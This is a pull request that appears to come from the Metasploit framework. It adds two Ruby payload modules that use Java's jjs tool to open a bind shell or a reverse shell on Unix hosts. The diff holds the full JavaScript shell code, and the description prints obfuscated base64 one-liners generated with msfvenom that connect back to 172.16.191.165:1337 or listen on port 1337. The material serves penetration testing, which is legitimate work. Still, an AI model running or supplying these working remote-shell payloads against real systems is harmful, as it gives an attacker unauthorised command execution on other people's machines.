### PR TITLE
Add bind/reverse jjs unix cmd payloads

### DIFF
--- a/modules/payloads/singles/cmd/unix/bind_jjs.rb
+++ b/modules/payloads/singles/cmd/unix/bind_jjs.rb
@@ -1,0 +1,73 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/handler/bind_tcp'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module MetasploitModule
+
+  CachedSize = :dynamic
+
+  include Msf::Payload::Single
+  include Msf::Sessions::CommandShellOptions
+
+  def initialize(info = {})
+    super(merge_info(info,
+      'Name'        => 'Unix Command Shell, Bind TCP (via jjs)',
+      'Description' => 'Listen for a connection and spawn a command shell via jjs',
+      'Author'      => [
+        'conerpirate', # jjs bind shell
+        'bcoles'       # metasploit
+      ],
+      'References'    => [
+        ['URL', 'https://gtfobins.github.io/gtfobins/jjs/'],
+        ['URL', 'https://cornerpirate.com/2018/08/17/java-gives-a-shell-for-everything/'],
+        ['URL', 'https://h4wkst3r.blogspot.com/2018/05/code-execution-with-jdk-scripting-tools.html'],
+      ],
+      'License'     => MSF_LICENSE,
+      'Platform'    => 'unix',
+      'Arch'        => ARCH_CMD,
+      'Handler'     => Msf::Handler::BindTcp,
+      'Session'     => Msf::Sessions::CommandShell,
+      'PayloadType' => 'cmd',
+      'RequiredCmd' => 'jjs',
+      'Payload'     => { 'Offsets' => {}, 'Payload' => '' }
+    ))
+    register_options [
+      OptString.new('SHELL', [ true, 'The shell to execute.', '/bin/sh' ])
+    ]
+  end
+
+  def generate
+    return super + command_string
+  end
+
+  def command_string
+    jcode = %Q{
+      var ss=new java.net.ServerSocket(#{datastore['LPORT']});
+      while(true){
+        var s=ss.accept();
+        var p=new java.lang.ProcessBuilder("#{datastore['SHELL']}").redirectErrorStream(true).start();
+        var pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();
+        var po=p.getOutputStream(),so=s.getOutputStream();
+        while(!s.isClosed()){
+          while(pi.available()>0)so.write(pi.read());
+          while(pe.available()>0)so.write(pe.read());
+          while(si.available()>0)po.write(si.read());
+          so.flush();
+          po.flush();
+          java.lang.Thread.sleep(50);
+          try{p.exitValue();break;}catch(e){}
+        };
+        p.destroy();s.close();ss.close();
+      }
+    }
+
+    minified = jcode.split("\n").map(&:lstrip).join
+
+    %Q{echo "eval(new java.lang.String(java.util.Base64.decoder.decode('#{Rex::Text.encode_base64(minified)}')));"|jjs}
+  end
+end

--- a/modules/payloads/singles/cmd/unix/reverse_jjs.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_jjs.rb
@@ -1,0 +1,74 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/handler/reverse_tcp'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module MetasploitModule
+
+  CachedSize = :dynamic
+
+  include Msf::Payload::Single
+  include Msf::Sessions::CommandShellOptions
+
+  def initialize(info = {})
+    super(merge_info(info,
+      'Name'        => 'Unix Command Shell, Reverse TCP (via jjs)',
+      'Description' => 'Connect back and create a command shell via jjs',
+      'Author'      => [
+        'conerpirate', # jjs reverse shell
+        'bcoles'       # metasploit
+      ],
+      'References'    => [
+        ['URL', 'https://gtfobins.github.io/gtfobins/jjs/'],
+        ['URL', 'https://cornerpirate.com/2018/08/17/java-gives-a-shell-for-everything/'],
+        ['URL', 'https://h4wkst3r.blogspot.com/2018/05/code-execution-with-jdk-scripting-tools.html'],
+      ],
+      'License'     => MSF_LICENSE,
+      'Platform'    => 'unix',
+      'Arch'        => ARCH_CMD,
+      'Handler'     => Msf::Handler::ReverseTcp,
+      'Session'     => Msf::Sessions::CommandShell,
+      'PayloadType' => 'cmd',
+      'RequiredCmd' => 'jjs',
+      'Payload'     => { 'Offsets' => {}, 'Payload' => '' }
+    ))
+    register_options [
+      OptString.new('SHELL', [ true, 'The shell to execute.', '/bin/sh' ])
+    ]
+  end
+
+  def generate
+    return super + command_string
+  end
+
+  def command_string
+    lhost = datastore['LHOST']
+    lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost)
+
+    jcode = %Q{
+      var ProcessBuilder=Java.type("java.lang.ProcessBuilder");
+      var p=new ProcessBuilder("#{datastore['SHELL']}").redirectErrorStream(true).start();
+      var ss=Java.type("java.net.Socket");
+      var s=new ss("#{lhost}",#{datastore['LPORT']});
+      var pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();
+      var po=p.getOutputStream(),so=s.getOutputStream();
+      while(!s.isClosed()){
+        while(pi.available()>0)so.write(pi.read());
+        while(pe.available()>0)so.write(pe.read());
+        while(si.available()>0)po.write(si.read());
+        so.flush();
+        po.flush();
+        Java.type("java.lang.Thread").sleep(50);
+        try{p.exitValue();break;}catch(e){}
+      };
+      p.destroy();s.close();
+  }
+  minified = jcode.split("\n").map(&:lstrip).join
+
+  %Q{echo "eval(new java.lang.String(java.util.Base64.decoder.decode('#{Rex::Text.encode_base64(minified)}')));"|jjs}
+  end
+end


### PR DESCRIPTION
Add bind/reverse jjs unix cmd payloads.

The `jjs` tool is installed with JRE 8 and is installed on plenty of Linux desktop distros by default.

I'm not sure how useful these payloads will be. Most Linux desktop distros will likely have a variety of other useful commands available (at least curl, wget, openssl, and probably perl and python) and probably whitelisted in application firewalls. Likewise, UNIX servers running JRE are likely to also have several viable tools available.

Also, `jjs` will apparently be [deprecated and removed from JDK](https://openjdk.java.net/jeps/335); however, it's unclear whether `jjs` will also be removed from JRE.

The generated payloads are also not particularly `BadChar` friendly, as they contain ` ' ) ; " | ` and space characters. Most of these (with the exception of `|`) could be removed by using `echo -e` and `${IFS}` (`nospace` encoder), at the expense of portability and introducing `\ $ { }` as potential `BadChar`.

It is also worth noting that the payload cmd process will continue to run if the session does not exit cleanly (ctrl+c), rather that cleanly terminating the shell process (`exit`), leaving a useless open socket.

It's nice to have options. This will get you a shell.

```
# ./msfvenom -p cmd/unix/reverse_jjs LHOST=172.16.191.165 LPORT=1337
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 863 bytes
echo "eval(new java.lang.String(java.util.Base64.decoder.decode('dmFyIFByb2Nlc3NCdWlsZGVyPUphdmEudHlwZSgiamF2YS5sYW5nLlByb2Nlc3NCdWlsZGVyIik7dmFyIHA9bmV3IFByb2Nlc3NCdWlsZGVyKCIvYmluL3NoIikucmVkaXJlY3RFcnJvclN0cmVhbSh0cnVlKS5zdGFydCgpO3ZhciBzcz1KYXZhLnR5cGUoImphdmEubmV0LlNvY2tldCIpO3ZhciBzPW5ldyBzcygiMTcyLjE2LjE5MS4xNjUiLDEzMzcpO3ZhciBwaT1wLmdldElucHV0U3RyZWFtKCkscGU9cC5nZXRFcnJvclN0cmVhbSgpLHNpPXMuZ2V0SW5wdXRTdHJlYW0oKTt2YXIgcG89cC5nZXRPdXRwdXRTdHJlYW0oKSxzbz1zLmdldE91dHB1dFN0cmVhbSgpO3doaWxlKCFzLmlzQ2xvc2VkKCkpe3doaWxlKHBpLmF2YWlsYWJsZSgpPjApc28ud3JpdGUocGkucmVhZCgpKTt3aGlsZShwZS5hdmFpbGFibGUoKT4wKXNvLndyaXRlKHBlLnJlYWQoKSk7d2hpbGUoc2kuYXZhaWxhYmxlKCk+MClwby53cml0ZShzaS5yZWFkKCkpO3NvLmZsdXNoKCk7cG8uZmx1c2goKTtKYXZhLnR5cGUoImphdmEubGFuZy5UaHJlYWQiKS5zbGVlcCg1MCk7dHJ5e3AuZXhpdFZhbHVlKCk7YnJlYWs7fWNhdGNoKGUpe319O3AuZGVzdHJveSgpO3MuY2xvc2UoKTs=')));"|jjs
```

```
# ./msfvenom -p cmd/unix/bind_jjs LPORT=1337
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 795 bytes
echo "eval(new java.lang.String(java.util.Base64.decoder.decode('dmFyIHNzPW5ldyBqYXZhLm5ldC5TZXJ2ZXJTb2NrZXQoMTMzNyk7d2hpbGUodHJ1ZSl7dmFyIHM9c3MuYWNjZXB0KCk7dmFyIHA9bmV3IGphdmEubGFuZy5Qcm9jZXNzQnVpbGRlcigiL2Jpbi9zaCIpLnJlZGlyZWN0RXJyb3JTdHJlYW0odHJ1ZSkuc3RhcnQoKTt2YXIgcGk9cC5nZXRJbnB1dFN0cmVhbSgpLHBlPXAuZ2V0RXJyb3JTdHJlYW0oKSxzaT1zLmdldElucHV0U3RyZWFtKCk7dmFyIHBvPXAuZ2V0T3V0cHV0U3RyZWFtKCksc289cy5nZXRPdXRwdXRTdHJlYW0oKTt3aGlsZSghcy5pc0Nsb3NlZCgpKXt3aGlsZShwaS5hdmFpbGFibGUoKT4wKXNvLndyaXRlKHBpLnJlYWQoKSk7d2hpbGUocGUuYXZhaWxhYmxlKCk+MClzby53cml0ZShwZS5yZWFkKCkpO3doaWxlKHNpLmF2YWlsYWJsZSgpPjApcG8ud3JpdGUoc2kucmVhZCgpKTtzby5mbHVzaCgpO3BvLmZsdXNoKCk7amF2YS5sYW5nLlRocmVhZC5zbGVlcCg1MCk7dHJ5e3AuZXhpdFZhbHVlKCk7YnJlYWs7fWNhdGNoKGUpe319O3AuZGVzdHJveSgpO3MuY2xvc2UoKTtzcy5jbG9zZSgpO30=')));"|jjs
```
